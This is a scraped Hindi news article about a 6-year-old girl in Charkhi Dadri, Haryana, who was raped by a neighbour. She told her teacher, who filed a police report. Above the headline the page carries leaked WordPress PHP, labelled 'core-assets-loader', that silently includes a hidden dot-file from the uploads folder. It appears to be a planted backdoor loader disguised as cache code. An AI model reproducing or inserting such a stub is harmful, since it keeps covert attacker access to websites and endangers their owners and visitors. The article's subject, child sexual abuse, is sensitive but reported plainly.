add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 6 साल की बच्ची के साथ पड़ोसी ने किया रेप, स्कूल टीचर को बताई आपबीती – SOCH INDIA
Menu

अपराध समाचार
6 साल की बच्ची के साथ पड़ोसी ने किया रेप, स्कूल टीचर को बताई आपबीती

nobanner

देश भर से लगातार रेप, गैंगरेप के मामले सामने आ रहे हैं. यूपी, जम्मू, गुजरात के बाद हरियाणा से भी एक ऐसा ही मामला सामने आया है. बच्ची की हालत खराब है और आरोपी फरार है. पुलिस मामले की जांच कर रही है.

हरियाणा से 6 साल की एक बच्ची के साथ पड़ोस में रहने वाले लड़के द्वारा रेप का मामला सामने आया है. बच्ची ने इस बात की जानकारी अपने टीचर को दी जिसके बाद पुलिस में मामला दर्ज कराया गया.

चरखी दादरी इलाके के सरकारी स्कूल के टीचर नानकचंद उस वक्त सन्न रह गए जब बच्ची ने मासूम आवाज में उन्हें दर्द की बात बताई. बच्ची स्कूल नहीं आई थी तो टीचर ने एक छात्र को देखने के लिए भेजा.

बच्ची ने स्कूल पहुंच कर टीचर को दर्द होने और पड़ोसी युवक की करतूत के बारे में बताया. टीचर बच्ची के साथ थाने पहुंचे और मामला दर्ज कराया. पुलिस ने बताया कि बच्ची का मेडिकल कराया गया है और आरोपी की तलाश की जा रही है.